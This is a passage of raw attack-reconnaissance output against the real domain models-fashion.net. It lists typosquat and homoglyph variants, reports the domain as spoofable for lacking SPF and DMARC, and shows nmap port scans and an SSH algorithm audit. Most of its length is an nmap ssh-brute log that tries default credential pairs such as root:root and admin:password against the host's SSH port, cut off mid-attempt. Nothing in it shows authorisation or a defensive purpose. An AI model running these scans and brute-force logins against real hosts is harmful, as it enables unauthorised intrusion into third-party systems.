1503Bit Flipping models-fawhion.net ? net
1504Bit Flipping models-fcshion.net ? net
1505Bit Flipping models-fqshion.net ? net
1506Bit Flipping models-nashion.net ? net
1507Bit Flipping models-vashion.net ? net
1508Bit Flipping modelsmfashion.net ? net
1509Bit Flipping modelw-fashion.net ? net
1510Bit Flipping modems-fashion.net ? net
1511Bit Flipping modens-fashion.net ? net
1512Bit Flipping modgls-fashion.net ? net
1513Bit Flipping modmls-fashion.net ? net
1514Bit Flipping moduls-fashion.net ? net
1515Bit Flipping moeels-fashion.net ? net
1516Bit Flipping molels-fashion.net ? net
1517Bit Flipping motels-fashion.net ? net
1518Bit Flipping oodels-fashion.net ? net
1519Homoglyphs m0dels-fashi0n.net ? net
1520Homoglyphs m0dels-fashion.net ? net
1521Homoglyphs moclels-fashion.net ? net
1522Homoglyphs mode1s-fashion.net ? net
1523Homoglyphs models-fashi0n.net ? net
1524Homoglyphs models-fashlon.net ? net
1525Homoglyphs rnodels-fashion.net ? net
1526Wrong TLD models-fashion.ca ? ca
1527Wrong TLD models-fashion.ch ? ch
1528Wrong TLD models-fashion.com 209.99.64.76 US,UNITED STATES com
1529Wrong TLD models-fashion.de ? de
1530Wrong TLD models-fashion.edu ? edu
1531Wrong TLD models-fashion.es ? es
1532Wrong TLD models-fashion.fr ? fr
1533Wrong TLD models-fashion.it ? it
1534Wrong TLD models-fashion.jp ? jp
1535Wrong TLD models-fashion.nl ? nl
1536Wrong TLD models-fashion.no ? no
1537Wrong TLD models-fashion.org ? org
1538Wrong TLD models-fashion.ru ? ru
1539Wrong TLD models-fashion.se ? se
1540Wrong TLD models-fashion.us ? us
1541#####################################################################################################################
1542vape-wild.biz
1543alt22.ru
1544jar3b.tech
1545mielesupport-spb.com
1546topshoes.org.uk
1547vapebest.co.uk
1548watchmedia.ru
1549context-ad.com
1550bfong.co
1551vapesoldes.fr
1552s-supports-ekb.com
1553zonicst.com
1554nonu-chan.com
1555time2time.ru
1556nablbark.com
1557b-esupport-spb.com
1558vapeswitzerland.biz
1559vapespain.biz
1560vapecheapest.co.uk
1561bestecasinotilbud.net
1562shortreviews.ru
1563topsneakers.biz
1564vapeuk.biz
1565vapetienda.es
1566sportsneakers.de
1567tqspa.co
1568vr-aschaffenburg.de
1569polodel.ru
1570sof-195.xyz
1571nivonaesupport-spb.com
1572topsneakers.shop
1573vapefrance.biz
1574hieas.co
1575onnekaskasinot.net
1576bbonlinesale.com
1577vapegerman.biz
1578acled.co
1579ezigarettenoutlet.de
1580vapeboutique.fr
1581runningshoes.es
1582topadidas.fr
1583tamchau.ru
1584top10spielautomaten.com
1585wedding-club.info
1586mooms.ru
1587delonghiesupport-spb.com
1588gaggiaesupport-spb.com
1589credica.ru
1590contactoil.ru
1591runningoutlet.ca
1592hmr.su
1593models-fashion.net
1594#####################################################################################################################
1595[+] models-fashion.net has no SPF record!
1596[*] No DMARC record found. Looking for organizational record
1597[+] No organizational DMARC record
1598[+] Spoofing possible for models-fashion.net!
1599#####################################################################################################################
1600WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
1601Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:18 EDT
1602Nmap scan report for models-fashion.net (213.183.63.253)
1603Host is up (0.14s latency).
1604rDNS record for 213.183.63.253: vm201114.melbi.space
1605Not shown: 488 closed ports, 6 filtered ports
1606Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1607PORT STATE SERVICE
160822/tcp open ssh
160980/tcp open http
1610
1611Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds
1612######################################################################################################################
1613Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:18 EDT
1614Nmap scan report for models-fashion.net (213.183.63.253)
1615Host is up (0.15s latency).
1616rDNS record for 213.183.63.253: vm201114.melbi.space
1617Not shown: 1 closed port
1618PORT STATE SERVICE
161953/udp open|filtered domain
162067/udp open|filtered dhcps
162168/udp open|filtered dhcpc
162269/udp open|filtered tftp
162388/udp open|filtered kerberos-sec
1624123/udp open|filtered ntp
1625137/udp open|filtered netbios-ns
1626138/udp open|filtered netbios-dgm
1627139/udp open|filtered netbios-ssn
1628161/udp open|filtered snmp
1629389/udp open|filtered ldap
1630500/udp open|filtered isakmp
1631520/udp open|filtered route
16322049/udp open|filtered nfs
1633
1634Nmap done: 1 IP address (1 host up) scanned in 4.75 seconds
1635######################################################################################################################
1636# general
1637(gen) banner: SSH-2.0-OpenSSH_7.4
1638(gen) software: OpenSSH 7.4
1639(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
1640(gen) compression: enabled (zlib@openssh.com)
1641
1642# key exchange algorithms
1643(kex) curve25519-sha256 -- [warn] unknown algorithm
1644(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
1645(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
1646 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1647(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
1648 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1649(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
1650 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1651(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1652 `- [info] available since OpenSSH 4.4
1653(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
1654(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
1655(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1656 `- [warn] using weak hashing algorithm
1657 `- [info] available since OpenSSH 2.3.0
1658(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
1659(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1660 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1661(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1662 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1663 `- [warn] using small 1024-bit modulus
1664 `- [warn] using weak hashing algorithm
1665 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1666
1667# host-key algorithms
1668(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1669(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
1670(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
1671(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
1672 `- [warn] using weak random number generator could reveal the key
1673 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1674(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
1675
1676# encryption algorithms (ciphers)
1677(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
1678 `- [info] default cipher since OpenSSH 6.9.
1679(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1680(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1681(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1682(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
1683(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
1684(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1685 `- [warn] using weak cipher mode
1686 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1687(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1688 `- [warn] using weak cipher mode
1689 `- [info] available since OpenSSH 2.3.0
1690(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1691 `- [warn] using weak cipher mode
1692 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1693(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1694 `- [fail] disabled since Dropbear SSH 0.53
1695 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1696 `- [warn] using weak cipher mode
1697 `- [warn] using small 64-bit block size
1698 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1699(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1700 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1701 `- [warn] using weak cipher mode
1702 `- [warn] using small 64-bit block size
1703 `- [info] available since OpenSSH 2.1.0
1704(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1705 `- [warn] using weak cipher
1706 `- [warn] using weak cipher mode
1707 `- [warn] using small 64-bit block size
1708 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1709
1710# message authentication code algorithms
1711(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
1712 `- [info] available since OpenSSH 6.2
1713(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
1714(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
1715(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
1716(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
1717 `- [info] available since OpenSSH 6.2
1718(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1719 `- [warn] using small 64-bit tag size
1720 `- [info] available since OpenSSH 4.7
1721(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
1722 `- [info] available since OpenSSH 6.2
1723(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1724 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1725(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1726 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1727(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1728 `- [warn] using weak hashing algorithm
1729 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1730
1731# algorithm recommendations (for OpenSSH 7.4)
1732(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1733(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
1734(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
1735(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1736(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1737(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
1738(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
1739(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
1740(rec) -blowfish-cbc -- enc algorithm to remove
1741(rec) -3des-cbc -- enc algorithm to remove
1742(rec) -aes256-cbc -- enc algorithm to remove
1743(rec) -cast128-cbc -- enc algorithm to remove
1744(rec) -aes192-cbc -- enc algorithm to remove
1745(rec) -aes128-cbc -- enc algorithm to remove
1746(rec) -hmac-sha2-512 -- mac algorithm to remove
1747(rec) -umac-128@openssh.com -- mac algorithm to remove
1748(rec) -hmac-sha2-256 -- mac algorithm to remove
1749(rec) -umac-64@openssh.com -- mac algorithm to remove
1750(rec) -hmac-sha1 -- mac algorithm to remove
1751(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
1752(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
1753#####################################################################################################################
1754Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:18 EDT
1755NSE: Loaded 51 scripts for scanning.
1756NSE: Script Pre-scanning.
1757Initiating NSE at 18:18
1758Completed NSE at 18:18, 0.00s elapsed
1759Initiating NSE at 18:18
1760Completed NSE at 18:18, 0.00s elapsed
1761Initiating Parallel DNS resolution of 1 host. at 18:18
1762Completed Parallel DNS resolution of 1 host. at 18:18, 0.02s elapsed
1763Initiating SYN Stealth Scan at 18:18
1764Scanning models-fashion.net (213.183.63.253) [1 port]
1765Discovered open port 22/tcp on 213.183.63.253
1766Completed SYN Stealth Scan at 18:18, 0.17s elapsed (1 total ports)
1767Initiating Service scan at 18:18
1768Scanning 1 service on models-fashion.net (213.183.63.253)
1769Completed Service scan at 18:18, 0.30s elapsed (1 service on 1 host)
1770Initiating OS detection (try #1) against models-fashion.net (213.183.63.253)
1771Retrying OS detection (try #2) against models-fashion.net (213.183.63.253)
1772Initiating Traceroute at 18:19
1773Completed Traceroute at 18:19, 0.17s elapsed
1774Initiating Parallel DNS resolution of 8 hosts. at 18:19
1775Completed Parallel DNS resolution of 8 hosts. at 18:19, 5.52s elapsed
1776NSE: Script scanning 213.183.63.253.
1777Initiating NSE at 18:19
1778NSE: [ssh-run 213.183.63.253:22] Failed to specify credentials and command to run.
1779NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:root
1780NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:admin
1781NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:administrator
1782NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:webadmin
1783NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:sysadmin
1784NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:netadmin
1785NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:guest
1786NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:user
1787NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:web
1788NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:test
1789NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:
1790NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:
1791NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:
1792NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:
1793NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:
1794NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:
1795NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:
1796NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:
1797NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:
1798NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:
1799NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:123456
1800NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:123456
1801NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:123456
1802NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:123456
1803NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:123456
1804NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:123456
1805NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:123456
1806NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:123456
1807NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:123456
1808NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:123456
1809NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:12345
1810NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:12345
1811NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:12345
1812NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:12345
1813NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:12345
1814NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:12345
1815NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:12345
1816NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:12345
1817NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:12345
1818NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:12345
1819NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:123456789
1820NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:123456789
1821NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:123456789
1822NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:123456789
1823NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:123456789
1824NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:123456789
1825NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:123456789
1826NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:123456789
1827NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:123456789
1828NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:123456789
1829NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:password
1830NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:password
1831NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:password
1832NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:password
1833NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:password
1834NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:password
1835NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:password
1836NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:password
1837NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:password
1838NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:password
1839NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:iloveyou
1840NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:iloveyou
1841NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:iloveyou
1842NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:iloveyou
1843NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:iloveyou
1844NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:iloveyou
1845NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:iloveyou
1846NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:iloveyou
1847NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:iloveyou
1848NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:iloveyou
1849NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:princess
1850NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:princess
1851NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:princess
1852NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:princess
1853NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:princess
1854NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:princess
1855NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:princess
1856NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:princess
1857NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:princess
1858NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:princess
1859NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:12345678
1860NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:12345678
1861NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:12345678
1862NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:12345678
1863NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:12345678
1864NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:12345678
1865NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:12345678
1866NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:12345678
1867NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:12345678
1868NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:12345678
1869NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:1234567
1870NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:1234567
1871NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:1234567
1872NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:1234567
1873NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:1234567
1874NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:1234567
1875NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:1234567
1876NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:1234567
1877NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:1234567
1878NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:1234567
1879NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:abc123
1880NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:abc123
1881NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:abc123
1882NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:abc123
1883NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:abc123
1884NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:abc123
1885NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:abc123
1886NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:abc123
1887NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:abc123
1888NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:abc123
1889NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:nicole
1890NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:nicole
1891NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:nicole
1892NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:nicole
1893NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:nicole
1894NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:nicole
1895NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:nicole
1896NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:nicole
1897NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:nicole
1898NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:nicole
1899NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:daniel
1900NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:daniel
1901NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:daniel
1902NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:daniel
1903NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:daniel
1904NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:daniel
1905NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:daniel
1906NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:daniel
1907NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:daniel
1908NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:daniel
1909NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:monkey
1910NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:monkey
1911NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:monkey
1912NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:monkey
1913NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:monkey
1914NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:monkey
1915NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:monkey
1916NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:monkey
1917NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:monkey
1918NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:monkey
1919NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:babygirl
1920NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:babygirl
1921NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:babygirl
1922NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:babygirl
1923NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:babygirl
1924NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:babygirl
1925NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:babygirl
1926NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:babygirl
1927NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:babygirl
1928NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:babygirl
1929NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:qwerty
1930NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:qwerty
1931NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:qwerty
1932NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:qwerty
1933NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:qwerty
1934NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:qwerty
1935NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:qwerty
1936NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:qwerty
1937NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:qwerty
1938NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:qwerty
1939NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:lovely
1940NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:lovely
1941NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:lovely
1942NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:lovely
1943NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:lovely
1944NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:lovely
1945NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:lovely
1946NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:lovely
1947NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:lovely
1948NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:lovely
1949NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:654321
1950NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:654321
1951NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:654321
1952NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:654321
1953NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:654321
1954NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:654321
1955NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:654321
1956NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:654321
1957NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:654321
1958NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:654321
1959NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:michael
1960NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:michael
1961NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:michael
1962NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:michael
1963NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:michael
1964NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:michael
1965NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:michael
1966NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:michael
1967NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:michael
1968NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:michael
1969NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:jessica
1970NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:jessica
1971NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:jessica
1972NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:jessica
1973NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:jessica
1974NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:jessica
1975NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:jessica
1976NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:jessica
1977NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:jessica
1978NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:jessica
1979NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:111111
1980NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:111111
1981NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:111111
1982NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:111111
1983NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:111111
1984NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:111111
1985NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:111111
1986NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:111111
1987NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:111111
1988NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:111111
1989NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:ashley
1990NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:ashley
1991NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: administrator:ashley
